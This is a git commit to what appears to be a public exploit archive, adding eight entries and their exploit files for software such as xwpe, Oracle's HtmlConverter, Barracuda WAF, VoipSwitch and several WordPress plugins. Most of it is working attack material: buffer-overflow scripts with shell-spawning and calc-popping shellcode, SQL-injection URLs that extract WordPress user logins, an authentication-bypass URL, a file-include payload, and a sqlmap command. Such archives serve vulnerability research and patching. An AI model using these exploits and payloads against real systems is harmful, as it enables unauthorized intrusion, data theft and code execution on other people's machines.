DB: 2016-01-22

8 new exploits
2016-01-22 05:03:46 +00:00 · 2016-01-22 05:03:46 +00:00 · 257c020493
commit 257c020493
parent 6804f1aa58
9 changed files with 316 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35519,3 +35519,11 @@ id,file,description,date,author,platform,type,port
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
 39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Include Vulnerability",2014-08-08,0x4148,php,webapps,0
 39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin 'wp-admin/admin-ajax.php' SQL Injection Vulnerability",2014-08-11,"Claudio Viviani",php,webapps,0
 39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
 39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
--- a/platforms/hardware/remote/39278.txt
+++ b/platforms/hardware/remote/39278.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/69028/info
 Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
 An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
 Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 
 http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest 
--- a/platforms/linux/local/39285.py
+++ b/platforms/linux/local/39285.py
@ -0,0 +1,95 @@
 # Exploit Author: Juan Sacco - http://www.exploitpack.com <
 jsacco@exploitpack.com>
 # Program: xwpe - Windows Editor v1.5.30a-2.1
 # Description: Programming environment and editor for console and X11
 # Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
 #
 # Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
 # overflow vulnerability because the application fails to perform adequate
 # boundary-checks on user-supplied input.
 #
 # An attacker could exploit this issue to execute arbitrary code in the
 # context of the application. Failed exploit attempts will result in a
 # denial-of-service condition.
 #
 # Vendor homepage: http://www.identicalsoftware.com/xwpe
 # Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
 # MD5: 793a89f7df892c7934be6c2353a6f0f9
 #
 #gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
 #Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
 #sh: 1: /usr/sbin/gpm: not found
 #
 #  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP:
 0x42434441
 #  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while
 running hook_stop:
 #Cannot access memory at address 0x42434441
 #0x42434441 in ?? ()
 #gdb$ backtrace
 #0  0x42434441 in ?? ()
 #1  0x4f4e2041 in ?? ()
 #2  0x61732054 in ?? ()
 #3  0x21646576 in ?? ()
 #4  0x206f440a in ?? ()
 #5  0x20756f79 in ?? ()
 #6  0x746e6177 in ?? ()
 #7  0x206f7420 in ?? ()
 #8  0x65766173 in ?? ()
 #9  0x6c694620 in ?? ()
 #10 0x003f2065 in ?? ()
 #11 0x00000088 in ?? ()
 #12 0x00000132 in ?? ()
 #13 0x00000006 in ?? ()
 #14 0x00002710 in ?? ()
 #15 0x0000009a in ?? ()
 #16 0xfac9bc00 in ?? ()
 #17 0x00000098 in ?? ()
 #18 0x00000011 in ?? ()
 #19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
 #20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
 #21 0x0809927d in ?? ()
 #22 0x0806b23c in ?? ()
 #23 0x08055c78 in ?? ()
 #24 0x080565b5 in ?? ()iles  ESC-F3 Close W.  F4 Search  ^L S.Again  ESC-X
 Quit
 #25 0x080574aa in ?? ()
 #26 0x0804b8b8 in ?? ()
 #27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
 argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
 <_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
 #28 0x08049ea1 in ?? ()
 import os,subprocess
 def run():
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP
    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])
  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise
 def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)
 if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
 run()
--- a/platforms/php/webapps/39279.txt
+++ b/platforms/php/webapps/39279.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/69089/info
 The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 wpSS 0.62 is vulnerable; other versions may also be affected. 
 http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# 
--- a/platforms/php/webapps/39280.txt
+++ b/platforms/php/webapps/39280.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/69105/info
 The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 HDW Player 2.4.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 
--- a/platforms/php/webapps/39281.txt
+++ b/platforms/php/webapps/39281.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/69109/info
 VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
 An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 
 https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg 
--- a/platforms/php/webapps/39282.txt
+++ b/platforms/php/webapps/39282.txt
@ -0,0 +1,38 @@
 source: http://www.securityfocus.com/bid/69181/info
 The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected. 
 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Accept-language: en-us,en;q=0.5
 Accept-encoding: gzip,deflate
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 10.0.0.67
 Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
 Pragma: no-cache
 Cache-control: no-cache,no-store
 Content-type: application/x-www-form-urlencoded; charset=utf-8
 Content-length: 120
 Connection: close
 action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
 Exploit via sqlmap:
 sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
 --data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql 
 ---
 Place: POST
 Parameter: selected_group
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
 ---
--- a/platforms/php/webapps/39283.txt
+++ b/platforms/php/webapps/39283.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/69222/info
 FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
 An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- 
--- a/platforms/windows/local/39284.txt
+++ b/platforms/windows/local/39284.txt
@ -0,0 +1,134 @@
 [+] Credits: hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
 Vendor:
 ===============
 www.oracle.com
 Product:
 ========================================
 Java Platform SE 6 U24 HtmlConverter.exe
 Product Version: 6.0.240.50
 The HTML Converter is part of Java SE binary part of the JDK and Allows web
 page authors to explicitly target
 the browsers and platforms used in their environment when modifying their
 pages.
 Vulnerability Type:
 ============================
 Buffer Overflow
 CVE Reference:
 ==============
 N/A
 Vulnerability Details:
 =====================
 When calling htmlConverter.exe with specially crafted payload it will cause
 buffer overflow executing arbitrary attacker supplied code.
 This was a small vulnerability included as part of the overall Oracle CPU
 released on January 19, 2016.
 Reference:
 http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
 registers ...
 EAX FFFFFFFE
 ECX FFFFFFFE
 EDX 0008E3C8
 EBX 7EFDE000
 ESP 0018FEB4
 EBP 0018FF88
 ESI 00001DB1
 EDI 00000000
 EIP 52525252                          <-------- "RRRR" \x52
 C 0  ES 002B 32bit 0(FFFFFFFF)
 P 0  CS 0023 32bit 0(FFFFFFFF)
 A 1  SS 002B 32bit 0(FFFFFFFF)
 Z 0  DS 002B 32bit 0(FFFFFFFF)
 S 0  FS 0053 32bit 7EFDD000(FFF)
 T 0  GS 002B 32bit 0(FFFFFFFF)
 D 0
 Exploit code(s):
 ===============
 ###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP @ 2493
 pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP 2469 - 2479
 #shellcode to pop calc.exe Windows 7 SP1
 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
 "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
 "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
 "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
 "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
 "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
 "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
 #JMP ESP kernel32.dll
 rp=struct.pack('<L', 0x76E72E2B)
 payload="A"*2469+rp+"\x90"*10+sc
 subprocess.Popen([pgm, payload], shell=False)
 Disclosure Timeline:
 =====================================
 Vendor Notification: August 28, 2015
 January 20, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Local
 Severity Level:
 ===============
 Medium
 Description:
 =============================================================
 Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe
 =============================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 by hyp3rlinx